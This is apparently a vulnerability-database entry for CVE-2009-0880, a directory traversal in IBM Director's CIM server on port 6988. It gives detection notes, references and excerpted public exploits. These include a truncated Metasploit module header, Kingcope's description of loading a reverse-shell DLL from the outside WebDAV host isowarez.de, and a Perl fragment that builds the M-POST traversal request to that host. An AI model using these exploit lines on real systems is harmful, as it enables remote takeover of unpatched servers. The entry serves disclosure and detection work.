CVE-2009-0880
Published 2009-03-12
Priority P3 (50) · Severity medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 31.60% (98.1st percentile)
Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute arbitrary local DLL code via a .. (dot dot) in a /CIMListener/ URI in an M-POST request.
Affected
15 ranges (only the first entry carries version data; the remaining 14 entries list vendor and product only, with no version range or fix version)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | director | <= 5.20.3 | — |
Detection & IOCs (extracted from sources)
- Detect M-POST requests to /CIMListener/ on TCP port 6988 with directory traversal (dot dot) sequences in the URI path, indicating exploitation of CVE-2009-0880.
- Scan for vulnerable IBM Director CIM servers by probing TCP/6988 with `M-POST /CIMListener/ HTTP/1.1` and checking for an HTTP 200 response containing 'CIMVERSION'.
- Check for the presence of the WebClient (WebDAV Mini-Redirector) service being enabled on target Windows hosts, as it is a prerequisite for remote DLL injection exploitation.
- Inspect HTTP headers on port 6988 for the combination of Man, CIMOperation, CIMExport, and CIMExportMethod headers, which are characteristic of exploit traffic against this vulnerability.
- Monitor for User-Agent strings matching Windows NT 5.1/5.2 or MiniRedir/5.1/5.2 patterns on the attacker-controlled WebDAV server, used by the exploit to fingerprint the target for payload delivery.
- Caveat: the WebDAV-based remote DLL injection vector requires the WebClient service to be running on the target; exploitation is not possible if it is disabled (default on Windows 2003 SP2).
- Caveat: the Metasploit module requires SRVPORT=80 and URIPATH=/ for the WebDAV delivery component to function; non-standard configurations will cause the exploit to fail.
- Caveat: the exploit affects IBM Director versions 5.20.3 and before, but not 5.2.30 SP2 and above; patched systems are not vulnerable.
No detection rules found.
Exploit-DB
IBM System Director Agent - DLL Injection (Metasploit)
exploitdb · 2012-12-07 · CVE-2009-0880
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

# The class declaration and the opening of initialize were lost in extraction
# (the "< ... =>" span was read as an HTML tag); they are restored here in the
# standard Metasploit3 form. The module's Rank and mixins are not in the excerpt.
class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'IBM System Director Agent DLL Injection',
      'Description' => %q{
        This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3
        to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM
        privileges.
        In order to accomplish remote DLL injection it uses a WebDAV service as disclosed
        by kingcope on December 2012. Because of this, the target host must have the
        WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically
        started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.
      },
      # The remainder of the module is not included in the indexed excerpt.
    ))
  end
end
```
Exploit-DB
IBM System Director Agent - Remote System Level
exploitdb · 2012-12-02 · CVSS 6.8 · CVE-2009-0880 [MEDIUM]
---
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force it to load a DLL remotely from a WebDAV share. The following exploit will load the DLL from
\\isowarez.de\\director\wootwoot.dll
The wootwoot.dll is a reverse shell that will send a shell back to the attacker (the code has to be inside the DLL initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it, the CVE states the attack can load local files only,
Exploit-DB
IBM System Director Agent 5.20 - CIM Server Privilege Escalation
exploitdb · 2009-03-10 · CVE-2009-0880
---
source: https://www.securityfocus.com/bid/34065/info

IBM Director is prone to a privilege-escalation vulnerability that affects the CIM server.
Attackers can leverage this issue to execute arbitrary code with elevated privileges in the context of the CIM server process.
Versions prior to IBM Director 5.20.3 Service Update 2 are affected.

```perl
use IO::Socket;

# 1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "6988",
                                 Proto    => 'tcp');

# CIM export indication body. The XML element tags were lost in extraction;
# only the text nodes survive in the indexed excerpt.
$payload =
qq{
Sample CIM_AlertIndication indication
1
3
2
20010515104354.000000:000
};

# M-POST to /CIMListener/ with a UNC path embedded in the URI (the traversal vector).
$req =
"M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/xml; charset=
```
The indexed excerpt ends here, mid-request.
Metasploit
IBM System Director Agent DLL Injection
metasploit
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3 to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM privileges. In order to accomplish remote DLL injection it uses a WebDAV service as disclosed by kingcope on December 2012. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.
No writeups or analysis indexed.
References
- http://osvdb.org/52616
- http://secunia.com/advisories/34212
- http://www.securityfocus.com/archive/1/501639/100/0/threaded
- http://www.securityfocus.com/bid/34065
- http://www.vupen.com/english/advisories/2009/0656
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49286
- https://www.sec-consult.com/files/20090305-2_IBM_director_privilege_escalation.txt
- https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8